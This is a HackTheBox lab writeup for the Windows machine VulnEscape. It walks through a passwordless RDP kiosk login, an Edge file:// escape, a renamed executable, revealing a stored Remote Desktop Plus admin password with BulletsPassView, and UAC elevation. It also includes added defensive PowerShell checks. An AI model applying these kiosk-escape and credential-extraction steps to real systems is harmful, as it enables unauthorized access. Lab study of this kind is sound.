VulnEscape

📅 Last Updated: Oct 10, 2025 05:59 | 📄 Size: 13.7 KB | 🎯 Type: HackTheBox Writeup | 🎚️ Difficulty: Easy

Nmap

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/VulnEscape]
└─$ nmap -sC -sV -Pn 10.129.234.51 -oN ./nmap.txt                                   
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-09 15:51 UTC
Nmap scan report for 10.129.234.51
Host is up (0.36s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Escape
| Not valid before: 2025-10-08T04:50:44
|_Not valid after:  2026-04-09T04:50:44
| rdp-ntlm-info: 
|   Target_Name: ESCAPE
|   NetBIOS_Domain_Name: ESCAPE
|   NetBIOS_Computer_Name: ESCAPE
|   DNS_Domain_Name: Escape
|   DNS_Computer_Name: Escape
|   Product_Version: 10.0.19041
|_  System_Time: 2025-10-09T04:53:12+00:00
|_ssl-date: 2025-10-09T04:53:20+00:00; -10h59m07s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -10h59m07s, deviation: 0s, median: -10h59m08s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.30 seconds

The only open port is Remote Desktop (RDP).

RDP - TCP 3389

I don't have any valid credentials yet, so I tried connecting without any:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/VulnEscape]
└─$ xfreerdp /v:10.129.234.51 /dynamic-resolution +clipboard -sec-nla

![[Pasted image 20251009155620.png]] The login screen hints at a username, KioskUser0. I guessed the password would either be the username (KioskUser0:KioskUser0) or empty.

I tried to connect with these credentials.

KioskUser0 with an empty password (KioskUser0:'') gets us in: ![[Pasted image 20251009160038.png]]

I tried clicking around the screen, but nothing happened. Pressing the Windows key pops up the start menu: ![[Pasted image 20251009170111.png]]

I tried to launch cmd and powershell from there, but neither worked: ![[Pasted image 20251009170145.png]]

Then I searched for Edge ![[Pasted image 20251009170158.png]] and it opens successfully ![[Pasted image 20251009170221.png]]

From the browser I can navigate to C:\ over file:// ![[Pasted image 20251009170305.png]]

We can find user.txt on the kiosk user's Desktop ![[Pasted image 20251009170348.png]]
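The kiosk escape above works because Edge is allowed to open file:// URLs, which turns the browser into a file manager and a download channel. As an added example (not part of the writeup and not kiosk configuration from the box), this PowerShell sets the Edge URLBlocklist policy to block file:// and verifies it; the registry path is the documented Edge policy location, and the helper names are mine.

```powershell
# Added example (not from the writeup): block file:// in Edge via the URLBlocklist policy
# and verify the setting. Must run elevated; Edge applies it at its next launch.
$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Edge\URLBlocklist'

function Block-EdgeFileUrls {
    # Values under URLBlocklist are strings named 1, 2, 3 ...; pick the next free index
    if (-not (Test-Path $policyKey)) { New-Item -Path $policyKey -Force | Out-Null }
    $existing = (Get-ItemProperty -Path $policyKey).PSObject.Properties |
                Where-Object { $_.Name -match '^\d+$' }
    if ($existing.Value -contains 'file://*') { return 'already blocked' }
    $max  = ($existing.Name | ForEach-Object { [int]$_ } | Measure-Object -Maximum).Maximum
    $next = 1 + $max          # $max is $null when the list is empty, so this yields 1
    New-ItemProperty -Path $policyKey -Name $next -Value 'file://*' -PropertyType String | Out-Null
    return "added entry $next"
}

function Test-EdgeFileUrlsBlocked {
    if (-not (Test-Path $policyKey)) { return $false }
    $values = (Get-ItemProperty -Path $policyKey).PSObject.Properties |
              Where-Object { $_.Name -match '^\d+$' } | ForEach-Object Value
    return [bool]($values -contains 'file://*')
}

Block-EdgeFileUrls
Test-EdgeFileUrlsBlocked    # edge://policy in the browser shows the applied list
```

Blocking file:// removes both the directory browsing and the "download cmd.exe from C:\Windows\System32" step; an assigned-access kiosk should also restrict the allowed apps, since the policy only covers Edge.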

Then I looked for cmd.exe ![[Pasted image 20251009170647.png]]

Clicking it downloads a copy ![[Pasted image 20251009170722.png]] Running it gives a restriction notice: the operation has been canceled due to system restrictions.

Often simply renaming the file is enough to make it run ![[Pasted image 20251009170933.png]] but that still did not work here.

So I guessed that only certain file names are allowed to run. We already know Edge runs normally ![[Pasted image 20251009171149.png]] and after renaming the copy to myedge.exe it runs normally.
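The restriction here keys on the on-disk file name, so a renamed cmd.exe passes. The PE version resource still says what the binary really is: cmd.exe carries OriginalFilename "Cmd.Exe" no matter what it is saved as, and AppLocker publisher rules match that embedded name rather than the path. As an added example (mine, not from the writeup), this PowerShell sweeps user-writable folders for executables whose embedded name disagrees with their file name; the folder list and function name are my choices.

```powershell
# Added example (not from the writeup): flag executables in user-writable folders whose
# embedded OriginalFilename disagrees with the on-disk name, e.g. cmd.exe saved as msedge.exe.
function Find-RenamedExecutable {
    param(
        [string[]]$Path = @("$env:USERPROFILE\Downloads", "$env:USERPROFILE\Desktop", $env:TEMP)
    )
    foreach ($dir in $Path) {
        if (-not (Test-Path $dir)) { continue }
        Get-ChildItem -Path $dir -Recurse -File -Filter *.exe -ErrorAction SilentlyContinue |
        ForEach-Object {
            $vi   = $_.VersionInfo
            $orig = $vi.OriginalFilename
            if ([string]::IsNullOrWhiteSpace($orig)) { return }   # no version resource: nothing to compare
            # Compare base names case-insensitively; some resources carry a different extension
            $origBase = [IO.Path]::GetFileNameWithoutExtension($orig)
            if ($origBase -ine $_.BaseName) {
                [pscustomobject]@{
                    Path             = $_.FullName
                    OnDiskName       = $_.Name
                    OriginalFilename = $orig
                    Description      = $vi.FileDescription
                    # A renamed copy of a signed Microsoft binary still verifies: the name is
                    # not part of the signature, which is why name-based allow-lists fail.
                    Signature        = (Get-AuthenticodeSignature -FilePath $_.FullName).Status
                }
            }
        }
    }
}

Find-RenamedExecutable | Format-Table -AutoSize
```

Run as a scheduled check or on a kiosk image it surfaces exactly the myedge.exe trick, and the Signature column shows why the durable fix is a publisher- or hash-based rule (AppLocker or WDAC) rather than an allowed-file-name list.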

Privilege escalation

There’s not much interesting in the KioskUser0 user’s home directory:

PS C:\Users\kioskUser0> tree /f .
Folder PATH listing
Volume serial number is 00000040 4A4B:52B4
C:\USERS\KIOSKUSER0
├───3D Objects
├───Contacts
├───Desktop
│       Microsoft Edge.lnk
│       user.txt
│
├───Documents
├───Downloads
│       msedge.exe
│
├───Favorites
├───Links
│       Desktop.lnk
│       Downloads.lnk
│
├───Music
├───Pictures
│   ├───Camera Roll
│   └───Saved Pictures
├───Saved Games
├───Searches
└───Videos

At the root of C:\, the listing shows only very standard folders:

PS C:\> ls

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          2/3/2024   3:11 AM                inetpub
d-----         12/7/2019   1:14 AM                PerfLogs
d-r---         4/10/2025  11:29 PM                Program Files
d-r---          2/3/2024   3:03 AM                Program Files (x86)
d-r---          2/3/2024   3:43 AM                Users
d-----         6/24/2025   1:24 PM                Windows

C:\_admin does not appear in that listing, but the directory exists and is interesting:

PS C:\_admin> ls

    Directory: C:\_admin

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          2/3/2024   3:04 AM                installers
d-----          2/3/2024   3:05 AM                passwords
d-----          2/3/2024   3:05 AM                temp
-a----          2/3/2024   3:03 AM              0 Default.rdp
-a----          2/3/2024   3:04 AM            574 profiles.xml

profiles.xml contains a saved Remote Desktop Plus connection profile:

<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
  <Profile>
    <ProfileName>admin</ProfileName>
    <UserName>127.0.0.1</UserName>
    <Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
    <Secure>False</Secure>
  </Profile>
</Data>

That password value is not plaintext; it looks like a base64-encoded hash or ciphertext.
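The real finding here is a profile file holding a stored credential that a kiosk user can read. As an added example (not from the writeup and not part of Remote Desktop Plus), this PowerShell locates profiles.xml files of this layout, lists the profiles that carry a stored password, and reports whether broad groups such as BUILTIN\Users can read the file; the function name and search root are my assumptions.

```powershell
# Added example (not from the writeup): find Remote Desktop Plus profile stores, list profiles
# holding a password, and flag files readable by non-administrators.
function Find-StoredRdpProfile {
    param([string[]]$SearchRoot = @('C:\'))
    $broadReaders = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')
    foreach ($root in $SearchRoot) {
        Get-ChildItem -Path $root -Recurse -Filter profiles.xml -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # The file on the box is UTF-16 with a BOM; Get-Content detects that, and the
            # [xml] cast ignores the encoding declaration once the text is already a string.
            try { [xml]$doc = Get-Content -Path $file.FullName -Raw } catch { return }
            if (-not $doc.Data -or -not $doc.Data.Profile) { return }   # different profiles.xml
            $acl = Get-Acl -Path $file.FullName
            $readableByAll = @($acl.Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $broadReaders -contains $_.IdentityReference.Value -and
                ($_.FileSystemRights -band [Security.AccessControl.FileSystemRights]::ReadData)
            }).Count -gt 0
            foreach ($p in @($doc.Data.Profile)) {
                [pscustomobject]@{
                    File          = $file.FullName
                    Profile       = $p.ProfileName
                    UserName      = $p.UserName
                    HasPassword   = -not [string]::IsNullOrEmpty($p.Password)
                    SecureFlag    = $p.Secure        # "False" on the box: stored, not prompted
                    ReadableByAll = $readableByAll
                }
            }
        }
    }
}

Find-StoredRdpProfile | Format-Table -AutoSize
```

For the file from the box this would report HasPassword = True and SecureFlag = False for the admin profile; whether ReadableByAll is True depends on the ACL of C:\_admin, which the writeup does not show, but the kiosk user could read it, so the practical fix is the same either way: move the profile out of a path the kiosk user can reach or do not store the password at all.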

There is an admin user on this machine:

PS C:\> net user

User accounts for \\ESCAPE

-------------------------------------------------------------------------------
admin                    Administrator            DefaultAccount
Guest                    kioskUser0               WDAGUtilityAccount
The command completed successfully.

In C:\Program Files (x86) there is a Remote Desktop Plus installation:

PS C:\Program Files (x86)> ls

    Directory: C:\Program Files (x86)

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         12/7/2019   1:31 AM                Common Files
d-----         6/24/2025   1:19 PM                Internet Explorer
d-----          2/3/2024   3:14 AM                Microsoft
d-----         12/7/2019   1:31 AM                Microsoft.NET
d-----          2/3/2024   3:03 AM                Remote Desktop Plus
d-----         6/24/2025  10:10 AM                Windows Defender
d-----          2/3/2024   3:07 AM                Windows Mail
d-----         6/24/2025  10:10 AM                Windows Media Player
d-----         6/24/2025   1:19 PM                Windows Multimedia Platform
d-----         12/7/2019   1:50 AM                Windows NT
d-----         6/24/2025  10:10 AM                Windows Photo Viewer
d-----         6/24/2025   1:19 PM                Windows Portable Devices
d-----         12/7/2019   1:31 AM                WindowsPowerShell

We can run it ![[Pasted image 20251009171657.png]]

It can import profiles.xml, but its file dialog only reaches the Downloads folder, so copy the file there first:

PS C:\> copy C:\_admin\profiles.xml C:\Users\kioskUser0\Downloads\

![[Pasted image 20251009171733.png]]

After importing, the password field is still masked with bullets ![[Pasted image 20251009171840.png]]

If I try to copy the password, it pops another error in Korean: ![[Pasted image 20251009171906.png]]

There's a utility named BulletsPassView from NirSoft that reveals the characters hidden behind password bullets on a Windows system. I'll start an SMB server on my host and copy it to the target machine:

smbserver.py share $(pwd) -smb2support -username wither -password wither

Then mount the share, copy the tool over, and run it:

PS C:\> net use \\10.10.14.79\share /u:wither wither
The command completed successfully.

PS C:\> copy \\10.10.14.79\share\BulletsPassView.exe C:\Users\kioskUser0\Downloads\

PS C:\> C:\Users\kioskUser0\Downloads\BulletsPassView.exe

It reveals the password Twisting3021 ![[Pasted image 20251009172121.png]]

I tried to connect over RDP as admin with it, but it did not work ![[Pasted image 20251009172157.png]] It said:

To log in remotely, you must have permission to log in through Remote Desktop Services. By default, members of the Remote Desktop Users group have this permission. If the group you currently belong to does not have this permission, or if this permission has been removed from the Remote Desktop Users group, you must be granted this permission manually.

Checking the account and its group membership:

PS C:\> net user admin
User name                    admin
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/3/2024 3:45:01 AM
Password expires             Never
Password changeable          2/3/2024 3:45:01 AM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   4/10/2025 11:26:42 PM

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

So admin is a member of Administrators but not of Remote Desktop Users, and VulnEscape must be configured so that Administrators membership alone does not grant the Remote Desktop logon right.

Instead, from the kiosk session, we can use runas to start a process as admin:
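The RDP failure above is decided by the "Allow log on through Remote Desktop Services" and "Deny log on through Remote Desktop Services" user rights, not by group membership as such. As an added example (mine, not from the writeup), this PowerShell exports the local policy with secedit and resolves who holds each right; the function name is my choice and secedit needs an elevated prompt.

```powershell
# Added example (not from the writeup): list the holders of the Remote Desktop logon rights
# (SeRemoteInteractiveLogonRight / SeDenyRemoteInteractiveLogonRight). Run elevated.
function Get-RdpLogonRight {
    $cfg = Join-Path $env:TEMP ("secpol-{0}.inf" -f [guid]::NewGuid())
    # secedit writes an .inf whose [Privilege Rights] section has lines like
    #   SeRemoteInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-555
    $null = secedit /export /cfg $cfg /areas USER_RIGHTS
    try {
        $lines = Get-Content -Path $cfg
        foreach ($right in 'SeRemoteInteractiveLogonRight', 'SeDenyRemoteInteractiveLogonRight') {
            $line = $lines | Where-Object { $_ -match "^$right\s*=" } | Select-Object -First 1
            $holders = @()
            if ($line) {
                $holders = ($line -split '=', 2)[1].Trim() -split ',' | ForEach-Object {
                    $entry = $_.Trim()
                    if ($entry.StartsWith('*')) {
                        # entries are SIDs prefixed with '*'; translate to names where possible
                        try {
                            (New-Object Security.Principal.SecurityIdentifier($entry.Substring(1))).
                                Translate([Security.Principal.NTAccount]).Value
                        } catch { $entry }
                    } else { $entry }
                }
            }
            [pscustomobject]@{ Right = $right; Holders = ($holders -join ', ') }
        }
    } finally {
        Remove-Item -Path $cfg -ErrorAction SilentlyContinue
    }
}

Get-RdpLogonRight | Format-Table -AutoSize
```

On a default workstation the allow right lists BUILTIN\Administrators and BUILTIN\Remote Desktop Users; a box that rejects a local administrator over RDP, as this one does, will show Administrators removed from the allow list or present in the deny list.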

PS C:\> runas /user:admin powershell
Enter the password for admin:
Attempting to start powershell as user "ESCAPE\admin" ...

![[Pasted image 20251009172308.png]]

But this shell is missing the full Administrator privileges:

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

This is the UAC-filtered half of the split admin token: Administrators is marked deny-only and most privileges are stripped.

Since we have an interactive session and the password, we can simply elevate: run start-process powershell.exe -verb runas, which pops the interactive UAC consent dialog ![[Pasted image 20251009172840.png]] Press the left (Yes) button and we get another PowerShell window ![[Pasted image 20251009172854.png]]

This shell has the full privilege set:

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
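The two whoami /priv listings above differ because the first runas shell holds the UAC-filtered token and the second the elevated one. As an added example (mine, not from the writeup), this PowerShell tells the two apart programmatically: a filtered token still lists BUILTIN\Administrators but flagged use-for-deny-only, which IsInRole honours, and only the elevated token carries the High Mandatory Level label. The function name is my choice; whoami /priv /fo csv is the same tool the writeup uses, in parseable form.

```powershell
# Added example (not from the writeup): classify the current token as standard user,
# UAC-filtered administrator, or fully elevated administrator.
function Get-TokenElevationState {
    $id        = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($id)
    $adminSid  = 'S-1-5-32-544'   # BUILTIN\Administrators
    $highLabel = 'S-1-16-12288'   # High Mandatory Level: only on the elevated token

    # The filtered token lists Administrators with the deny-only attribute;
    # IsInRole respects that, so it is $true only for the elevated token.
    $adminsListed  = @($id.Groups | Where-Object { $_.Value -eq $adminSid }).Count -gt 0
    $elevated      = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    $highIntegrity = @($id.Groups | Where-Object { $_.Value -eq $highLabel }).Count -gt 0

    # Same table as "whoami /priv" in the writeup, as objects with Privilege Name/Description/State
    $privs = whoami /priv /fo csv | ConvertFrom-Csv

    $state = if ($elevated) { 'full admin token' }
             elseif ($adminsListed) { 'UAC-filtered admin token (Administrators deny-only)' }
             else { 'standard user' }

    [pscustomobject]@{
        User              = $id.Name
        AdminGroupPresent = $adminsListed
        Elevated          = $elevated
        HighIntegrity     = $highIntegrity
        State             = $state
        PrivilegeCount    = @($privs).Count
        EnabledPrivileges = (@($privs | Where-Object State -eq 'Enabled').'Privilege Name') -join ', '
    }
}

Get-TokenElevationState | Format-List
```

In the first shell above this reports a filtered token with 5 privileges; in the elevated shell it reports a full token with SeDebugPrivilege and SeImpersonatePrivilege among the enabled ones. From the defender's side, the elevation required a UAC consent click in an interactive session, which is exactly the event (4688 for the elevated process, with the consent.exe parent chain) worth alerting on for a kiosk account.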

Now we can read the root flag:

PS C:\Windows\system32> cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          2/3/2024   9:07 AM           2332 Microsoft Edge.lnk
-ar---         10/8/2025   9:51 PM             34 root.txt

Description

VulnEscape is an Easy Windows machine: Log in via default RDP as KioskUser0 without a password. Edge's file:// bypass allows browsing the file system and opening PowerShell in a restricted environment. After discovering and loading the Remote Desktop Plus configuration file, BulletsPassView extracts the password. This password is used to log in as admin, bypass UAC, and read the root flag.